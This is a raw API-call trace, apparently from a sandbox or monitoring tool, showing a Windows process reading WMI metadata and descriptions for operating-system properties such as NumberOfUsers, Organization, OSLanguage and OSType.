	[0050.717] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.717] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.717] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The inherited Name property serves as key of an operating system instance within a computer system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.717] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.717] lstrlenA (lpString="") returned 0
	[0050.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0d0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.717] SysStringLen (param_1="The inherited Name property serves as key of an operating system instance within a computer system.") returned 0x63
	[0050.717] SysStringLen (param_1="") returned 0x0
	[0050.718] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.718] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.718] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.718] SysStringLen (param_1="Name") returned 0x4
	[0050.719] SysStringLen (param_1="Description") returned 0xb
	[0050.719] SysStringLen (param_1="Name") returned 0x4
	[0050.719] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.719] SysStringLen (param_1="Name") returned 0x4
	[0050.719] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.719] SysStringLen (param_1="Name") returned 0x4
	[0050.719] SysStringLen (param_1="Locale") returned 0x6
	[0050.719] SysStringLen (param_1="Name") returned 0x4
	[0050.719] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.719] SysStringLen (param_1="Name") returned 0x4
	[0050.719] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.719] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.719] SysStringLen (param_1="Name") returned 0x4
	[0050.719] IUnknown:Release (This=0x233e12db340) returned 0x1
	[0050.719] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.719] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eaa48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.719] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea508, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.719] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.719] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of user licenses for the operating system. If unlimited, enter 0. If unknown, enter -1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.720] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.720] lstrlenA (lpString="") returned 0
	[0050.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.720] SysStringLen (param_1="Number of user licenses for the operating system. If unlimited, enter 0. If unknown, enter -1.") returned 0x5e
	[0050.720] SysStringLen (param_1="") returned 0x0
	[0050.720] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.720] IWbemClassObject:Get (in: This=0x233e12d9b10, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.720] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="Description") returned 0xb
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="Locale") returned 0x6
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] SysStringLen (param_1="Name") returned 0x4
	[0050.721] SysStringLen (param_1="Name") returned 0x4
	[0050.721] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.721] IUnknown:Release (This=0x233e12d9b10) returned 0x1
	[0050.721] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.721] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.721] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec128, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.721] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.722] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of process contexts currently loaded or running on the operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.722] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.722] lstrlenA (lpString="") returned 0
	[0050.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.722] SysStringLen (param_1="Number of process contexts currently loaded or running on the operating system.") returned 0x4f
	[0050.722] SysStringLen (param_1="") returned 0x0
	[0050.723] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.723] IWbemClassObject:Get (in: This=0x233e12dbe00, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.723] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="Description") returned 0xb
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="Locale") returned 0x6
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="Name") returned 0x4
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.723] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.723] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.723] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.724] IUnknown:Release (This=0x233e12dbe00) returned 0x1
	[0050.724] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.724] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b848, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.724] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.724] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.724] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of user sessions for which the operating system is currently storing state information", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.724] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.725] lstrlenA (lpString="") returned 0
	[0050.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.725] SysStringLen (param_1="Number of user sessions for which the operating system is currently storing state information") returned 0x5d
	[0050.725] SysStringLen (param_1="") returned 0x0
	[0050.725] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.725] IWbemClassObject:Get (in: This=0x233e12da5d0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.725] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.725] SysStringLen (param_1="Description") returned 0xb
	[0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.725] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.725] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.725] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.725] SysStringLen (param_1="Name") returned 0x4
	[0050.725] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.725] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0050.726] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.726] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.726] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.726] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.726] IUnknown:Release (This=0x233e12da5d0) returned 0x1
	[0050.726] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.726] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec3f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.726] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128be88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.726] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.726] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Organization property indicates the the registered user's (of the operating system) company name./nExample: Microsoft Corporation.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.727] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.727] lstrlenA (lpString="") returned 0
	[0050.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.727] SysStringLen (param_1="The Organization property indicates the the registered user's (of the operating system) company name./nExample: Microsoft Corporation.") returned 0x86
	[0050.727] SysStringLen (param_1="") returned 0x0
	[0050.727] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.727] IWbemClassObject:Get (in: This=0x233e12d9dc0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.728] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="Description") returned 0xb
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="Name") returned 0x4
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.728] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.728] SysStringLen (param_1="Organization") returned 0xc
	[0050.728] IUnknown:Release (This=0x233e12d9dc0) returned 0x1
	[0050.728] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.729] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128be88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.729] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b948, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.729] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.729] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The OSLanguage property indicates which language version of the operating system is installed./nExample: 0x0807 (German, Switzerland)", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.729] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.729] lstrlenA (lpString="") returned 0
	[0050.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc160, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.730] SysStringLen (param_1="The OSLanguage property indicates which language version of the operating system is installed./nExample: 0x0807 (German, Switzerland)") returned 0x85
	[0050.730] SysStringLen (param_1="") returned 0x0
	[0050.730] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.730] IWbemClassObject:Get (in: This=0x233e12db8a0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.730] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="Description") returned 0xb
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="Name") returned 0x4
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.730] SysStringLen (param_1="Organization") returned 0xc
	[0050.730] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0050.730] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.731] IUnknown:Release (This=0x233e12db8a0) returned 0x1
	[0050.731] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.731] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea568, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.731] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea7a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.731] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.731] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The OSProductSuite property identifies installed and licensed system product additions to the operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.731] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.731] lstrlenA (lpString="") returned 0
	[0050.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.732] SysStringLen (param_1="The OSProductSuite property identifies installed and licensed system product additions to the operating system.") returned 0x6f
	[0050.732] SysStringLen (param_1="") returned 0x0
	[0050.732] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.732] IWbemClassObject:Get (in: This=0x233e12db5f0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.732] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="Description") returned 0xb
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="Name") returned 0x4
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] SysStringLen (param_1="Organization") returned 0xc
	[0050.732] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.732] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.732] IUnknown:Release (This=0x233e12db5f0) returned 0x1
	[0050.733] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.733] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b948, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.733] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bf08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.733] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.733] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="A integer indicating the type of operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.733] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.733] lstrlenA (lpString="") returned 0
	[0050.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc120, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.733] SysStringLen (param_1="A integer indicating the type of operating system.") returned 0x32
	[0050.733] SysStringLen (param_1="") returned 0x0
	[0050.734] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.734] IWbemClassObject:Get (in: This=0x233e12dbb50, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bf50*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271070, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.734] SafeArrayGetLBound (in: psa=0x233e128bf50, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.734] SafeArrayGetUBound (in: psa=0x233e128bf50, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
